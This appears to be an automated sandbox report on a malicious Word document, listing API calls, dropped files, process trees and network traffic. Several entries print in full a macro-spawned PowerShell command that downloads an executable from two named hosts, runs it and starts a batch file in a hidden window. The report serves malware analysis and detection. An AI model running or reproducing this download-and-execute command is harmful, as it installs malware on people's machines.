NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$thenticationCode-3139821.doc

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\owernice38.bat

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile June 25, 2021, 8:44 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000198 filepath: C:\Users\test22\AppData\Local\Temp\~$thenticationCode-3139821.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$thenticationCode-3139821.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell "function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,'C:\Users\test22\AppData\Local\Temp\klerscor.exe');start-process 'C:\Users\test22\AppData\Local\Temp\klerscor.exe';}try{chaitra2('http://kalameafoods.gr/supetre.orau')}catch{chaitra2('http://starvdata.com/supetre.orau')}
cmdline	cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden"
cmdline	powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''C:\Users\test22\AppData\Local\Temp\klerscor.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owernice38.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owernice38.bat' -windowstyle hidden"

Word document hooks document open

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW June 25, 2021, 8:44 a.m.	thread_identifier: 7032 thread_handle: 0x000004a8 process_identifier: 3236 current_directory: filepath: track: 1 command_line: cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000004b4	1	1
CreateProcessInternalW June 25, 2021, 8:44 a.m.	thread_identifier: 5540 thread_handle: 0x00000084 process_identifier: 4372 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''C:\Users\test22\AppData\Local\Temp\klerscor.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owernice38.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owernice38.bat' -windowstyle hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
ShellExecuteExW June 25, 2021, 8:44 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\owernice38.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\owernice38.bat	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 25, 2021, 8:44 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (50 out of 158 events)

Data received	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 24 Jun 2021 23:47:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Cache-Control: no-cache Pragma: no-cache Set-Cookie: 7177df3407e5c06cf4c9705ffc741d09=4832b875d5c1b44dc31cb118c5799281; path=/; HttpOnly Referrer-Policy: X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff 386 <!doctype html> <html class="error-page" lang="en-gb" dir="ltr"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Error: 404 Page not found</title> <link rel="icon" href="/images/k.png" /> <link href="/templates/themis/css/bootstrap.min.css" rel="stylesheet"> <link href="/templates/themis/css/font-awesome.min.css" rel="stylesheet"> <link href="/templates/themis/css/template.css" rel="stylesheet"> <link href="/templates/themis/css/presets/preset3.css" rel="stylesheet"> </head> <body> <div class="container"> <h1 class="error-code">404</h1> <h2 class="error-message">Page not found</h2> <a href="/index.php" class="btn btn-secondary"><span class="fa fa-home" aria-hidden="true"></span> Home Page</a> </div> </body> </html> 0
Data received	HTTP/1.1 301 Moved Permanently Date: Thu, 24 Jun 2021 23:47:05 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Location: http://www.starvdata.com/supetre.orau Content-Length: 0 Keep-Alive: timeout=5, max=75 Content-Type: text/html; charset=UTF-8
Data received	HTTP/1.1 404 Not Found Date: Thu, 24 Jun 2021 23:47:07 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.starvdata.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Vary: Accept-Encoding Keep-Alive: timeout=5, max=75 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 a3 <!DOCTYPE html> <html lang="en-US"> <head> <meta name="google-site-verification" content="yQPV7kVobmH4eg4iG-AecofKoBQlaTKi_tIqosCcVyI" /> <meta charset="
Data received	1
Data received	6
Data received
Data received
Data received	UTF-8" /> <title>
Data received
Data received	2
Data received	9
Data received	Page not found - Star Vertex</title>
Data received	<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
Data received	5
Data received	<link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="
Data received	e
Data received	http://www.starvdata.com/xmlrpc.php" /> <link rel="shortcut icon" type="image/x-icon" href="
Data received	b
Data received	0
Data received	https://www.starvdata.com/wp-content/uploads/2016/11/icon-1-1.png"> <link rel="apple-touch-icon" href="https://www.starvdata.com/wp-content/uploads/2016/11/icon-1-1.png"/>
Data received	<link href='//fonts.googleapis.com/css?family=Raleway:100,200,300,400,500,600,700,800,900,300italic,400italic\|Raleway:100,200,300,400,500,600,700,800,900,300italic,400italic&subset=latin,latin-ext' rel='stylesheet' type='text/css'>
Data received	<!-- This site is optimized with the Yoast SEO plugin v12.9.1 - https://yoast.com/wordpress/plugins/seo/ -->
Data received	f
Data received	<meta name="robots" content="noindex,follow"/>
Data received	<meta property="og:locale" content="en_US" />
Data received	7
Data received	<meta property="og:type" content="object" /> <meta property="og:title" content="Page not found - Star Vertex" />
Data received	3
Data received	<meta property="og:site_name" content="Star Vertex" />
Data received	4
Data received	<meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Page not found - Star Vertex" />
Data received	<script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.starvdata.com/#website","url":"https://www.starvdata.com/","name":"Star Vertex","description":"Business Data Rentals","potentialAction":{"@type":"SearchAction","target":"https://www.starvdata.com/?s={search_term_string}","query-input":"required name=search_term_string"}}]}</script> <!-- / Yoast SEO plugin. -->
Data received	<link rel='dns-prefetch' href='//maps.googleapis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' />
Data received	d
Data received	<link rel='dns-prefetch' href='//s.w.org' />
Data received	c
Data received	<link rel="alternate" type="application/rss+xml" title="Star Vertex » Feed" href="https://www.starvdata.com/feed/" />
Data received	8
Data received	<link rel="alternate" type="application/rss+xml" title="Star Vertex » Comments Feed" href="https://www.starvdata.com/comments/feed/" />
Data received	<script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.starvdata.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.8"}}; !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p\|\|!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,6503
Data received	9,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything\|\|(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",functi
Data received	on(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source\|\|{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings); </script>
Data received	<style
Data received	type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style>
Data received	a
Data received	<link rel='stylesheet' id='wp-block-library-css' href='http://www.starvdata.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.8' type='text/css' media='all' />
Data received	<link rel='stylesheet' id='layerslider-css' href='http://www.starvdata.com/wp-content/plugins/LayerSlider/static/css/layerslider.css?ver=5.2.0' type='text/css' media='all' />
Data received	<link rel='stylesheet' id='ls-google-fonts-css' href='http://fonts.googleapis.com/css?family=Lato:100,300,regular,700,900%7COpen+Sans:300%7CIndie+Flower:regular%7COswald:300,regular,700&subset=latin' type='text/css' media='all' />
Data received	<link rel='stylesheet' id='contact-form-7-css' href='http://www.starvdata.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.6' type='text/css' media='all' />
Data received	<link rel='stylesheet' id='rs-plugin-settings-css' href='http://www.starvdata.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.2.6' type='text/css' media='all' />

Poweshell is sending data to a remote host (3 events)

Data sent	GET /supetre.orau HTTP/1.1 Host: kalameafoods.gr Connection: Keep-Alive
Data sent	GET /supetre.orau HTTP/1.1 Host: starvdata.com Connection: Keep-Alive
Data sent	GET /supetre.orau HTTP/1.1 Host: www.starvdata.com Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 25, 2021, 8:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 25, 2021, 8:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (2 events)

host	13.82.24.228
host	172.217.25.14

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\klerscor.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\owernice38.bat

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

winword.exe

martian_process

cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" | out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden"

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send June 25, 2021, 8:44 a.m.	buffer: GET /supetre.orau HTTP/1.1 Host: kalameafoods.gr Connection: Keep-Alive socket: 1436 sent: 77	1	77
send June 25, 2021, 8:44 a.m.	buffer: GET /supetre.orau HTTP/1.1 Host: starvdata.com Connection: Keep-Alive socket: 1488 sent: 75	1	75
send June 25, 2021, 8:44 a.m.	buffer: GET /supetre.orau HTTP/1.1 Host: www.starvdata.com Connection: Keep-Alive socket: 1492 sent: 79	1	79

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Local\Temp\owernice38.bat
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\owernice38.bat"
parent_process	winword.exe	martian_process	cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" \| out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden"

Creates a suspicious Powershell process (5 events)

value	Uses powershell to execute a file download from the command line
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
value	Uses powershell to execute a file download from the command line

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Users\test22\AppData\Local\Temp\klerscor.exe

Powershell Downloader DFSP detected (1 event)

AuthenticationCode-3139821.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All